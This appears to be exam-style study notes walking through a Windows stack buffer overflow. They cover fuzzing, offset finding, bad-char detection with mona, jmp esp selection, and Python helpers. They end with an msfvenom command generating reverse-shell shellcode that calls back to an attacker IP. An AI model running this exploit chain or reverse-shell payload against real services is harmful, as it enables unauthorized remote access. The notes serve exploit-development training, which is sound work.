Buffer Overflow
Steps
Run Immunity Debugger
Open the exe file or attach to the running service
Set the mona working directory:
!mona config -set workingfolder c:\mona\%p
Press the play button to run the process
Try to connect to the service:
nc $IP <port>
Immunity Debugger will tell you which port the service is listening on.
Fuzz until the service crashes and note the number of bytes that caused the crash.
Generate a unique pattern with a script and send it the same way the fuzzer did (pattern length = crash byte count + 200).

Find the offset with mona or another tool:
!mona findmsp -distance <length of pattern>
or use a website that takes just the EIP value as input.
[Optional] Verify the offset by placing BBBB at it and checking that EIP reads 42424242.
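The pattern and offset step above, as an added example (my own reference implementation, not part of the original notes and not mona's or Metasploit's code): it builds the same upper/lower/digit triplet pattern that the pattern_create script uses, looks up the crash-time EIP value in it, and packs an address little-endian, which is the same byte reversal the jmp esp step later in these notes does by hand. Function names are my own.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def create_pattern(length):
    """Cyclic pattern in the pattern_create style: Aa0Aa1...Az9Ba0...
    Unique 4-byte windows for up to 26 * 26 * 10 * 3 = 20280 bytes."""
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the unique span of the pattern")


def find_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that landed in EIP.

    eip_value is the register as shown by the debugger (int or hex string,
    e.g. 0x41356141 / "41356141"). x86 is little-endian, so the register
    value is repacked to the byte order in which it sat in the buffer
    before searching the pattern for it.
    """
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    needle = struct.pack("<I", eip_value)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("EIP value not found in pattern; check the pattern length")
    return offset


def pack_address(address):
    """Little-endian form of a 32-bit address, i.e. the 'write it reverse'
    step: 0x62501203 -> b'\\x03\\x12\\x50\\x62'."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    pattern = create_pattern(2200)           # crash size + 200 as in the notes
    print("offset:", find_offset(pattern, "41356141"))
    print("packed:", pack_address(0x62501203))
```

The offset lookup fails loudly rather than returning -1, since a silent -1 would later be used as a buffer size.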
Generate the byte array with mona (make sure the working directory has been set):
!mona bytearray -b "\x00"
Create the same byte array, without "\x00", in a Python script
Send the byte array and compare it with mona against memory at the ESP address:
!mona compare -f C:\mona\oscp\bytearray.bin -a <esp address>
How to note bad chars (the byte right after a bad char is usually corrupted as a side effect, so it is not itself a bad char):
00 is always a bad char
The second char is a bad char
The third char is affected by the second char, so it is not a bad char
The fourth char is a bad char
The fifth char is affected by the fourth char, so it is not a bad char
and so on

Re-test with the found bad chars excluded; when the mona memory comparison result shows "Unmodified", your bad char list is correct.
Search the loaded modules for a jmp esp instruction. You control EIP and your payload sits at ESP, so pointing EIP at a jmp esp makes execution jump to ESP (your payload):
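The bad char rule above, as an added example (not part of the original notes and not mona's code): it builds the byte array without the bytes already known to be bad and replays the comparison rule, treating the byte after each mismatch as "affected" rather than bad, and stopping when memory does not re-synchronise, which is the case where a bad char truncated the buffer. The memory dump is a constructed sample standing in for what the debugger shows at ESP; function names are my own.

```python
def build_bytearray(exclude=(0x00,)):
    """All 256 byte values, ascending, minus those already known to be bad
    (0x00 by default, matching: !mona bytearray -b "\\x00")."""
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(sent, seen):
    """Walk the sent array and the bytes seen in memory side by side.

    Rule from the notes: a mismatch is a bad char; the byte right after it is
    usually mangled as a side effect and is NOT a bad char, so scanning
    resumes two bytes on. If memory has not re-synchronised there, the bad
    char truncated the buffer: stop, exclude what was found, resend, repeat.
    (Two genuinely bad bytes in a row are caught by that resend.)

    Returns (bad_chars, truncated); ([], False) is mona's "Unmodified".
    """
    bad = []
    i = 0
    while i < len(sent):
        if i < len(seen) and sent[i] == seen[i]:
            i += 1
            continue
        bad.append(sent[i])
        resume = i + 2                      # skip the "affected" byte at i + 1
        if seen[resume:resume + 1] != sent[resume:resume + 1]:
            return bad, True
        i = resume
    return bad, False


# Constructed sample dump: a copy of the sent array in which 0x0a and 0x0d
# were each replaced by 0x00 and the byte following each was overwritten.
SENT = build_bytearray()
_seen = bytearray(SENT)
_seen[SENT.index(0x0a)] = 0x00
_seen[SENT.index(0x0a) + 1] = 0x41
_seen[SENT.index(0x0d)] = 0x00
_seen[SENT.index(0x0d) + 1] = 0x42
SAMPLE_SEEN = bytes(_seen)


if __name__ == "__main__":
    bad, truncated = find_badchars(SENT, SAMPLE_SEEN)
    print("bad chars:", ["\\x%02x" % b for b in bad], "truncated:", truncated)
    print("unmodified:", find_badchars(SENT, SENT) == ([], False))
```

On a truncated comparison only the first bad char is reliable; regenerate the array with it excluded (`build_bytearray((0x00, *bad))`) and send again, exactly as the notes say to repeat until "Unmodified".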
!mona jmp -r esp -cpb "<bad chars>"
# example
!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"

Take the address of the jmp esp and write it in reverse byte order (little-endian):
# example
0x62501203
module_address = "\x03\x12\x50\x62"
Generate the payload:
# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode
# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcode